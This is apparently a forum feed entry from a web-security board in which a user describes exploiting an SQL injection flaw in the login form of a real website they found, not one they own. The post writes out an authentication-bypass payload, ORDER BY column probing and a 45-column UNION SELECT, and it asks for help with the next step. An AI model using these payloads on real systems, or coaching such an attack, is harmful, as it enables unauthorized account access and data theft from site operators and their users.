45 columns ? really ?

45 columns ? really ? hello i follow this guide to learn : http://thehackerlounge.blogspot.fr/2009/05/full-sql-injection-tutorial-mysql.html on a website i found, the flaw is on a login form, i just have to type a " OR 1=1 LIMIT 100000 OFFSET 1# and i am loged on the first account so i decided to train on that website i used " ORDER BY x # and i found... 45 columns O_o --> " ORDER BY 45# no error (log me in) and " ORDER BY 46# returned me an error "Impossible d'exécuter la requête : ligne ( 40 ) Unknown column '46' in 'order clause'" so i used " union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45# ... but it just log me in :p any idea on what i should do next ? edit : i can give you the website but not sure if its required ? http://sla.ckers.org/forum/read.php?16,46314,46314#msg-46314 Sat, 18 May 2013 04:37:20 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?16,46314,47460#msg-47460 Re: 45 columns ? really ? http://sla.ckers.org/forum/read.php?16,46314,47460#msg-47460 0x3a SQL and Code Injection Sun, 22 Apr 2012 01:43:10 -0500 http://sla.ckers.org/forum/read.php?16,46314,47459#msg-47459 Re: 45 columns ? really ? http://sla.ckers.org/forum/read.php?16,46314,47459#msg-47459 huz SQL and Code Injection Sun, 22 Apr 2012 00:58:44 -0500 http://sla.ckers.org/forum/read.php?16,46314,46314#msg-46314 45 columns ? really ? http://sla.ckers.org/forum/read.php?16,46314,46314#msg-46314
i follow this guide to learn : http://thehackerlounge.blogspot.fr/2009/05/full-sql-injection-tutorial-mysql.html

on a website i found, the flaw is on a login form, i just have to type a " OR 1=1 LIMIT 100000 OFFSET 1# and i am loged on the first account

so i decided to train on that website

i used " ORDER BY x # and i found... 45 columns O_o --> " ORDER BY 45# no error (log me in) and " ORDER BY 46# returned me an error "Impossible d'exécuter la requête : ligne ( 40 ) Unknown column '46' in 'order clause'"

so i used

" union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45# ... but it just log me in :p

any idea on what i should do next ?

edit : i can give you the website but not sure if its required ?]]> manserk SQL and Code Injection Thu, 12 Apr 2012 14:02:23 -0500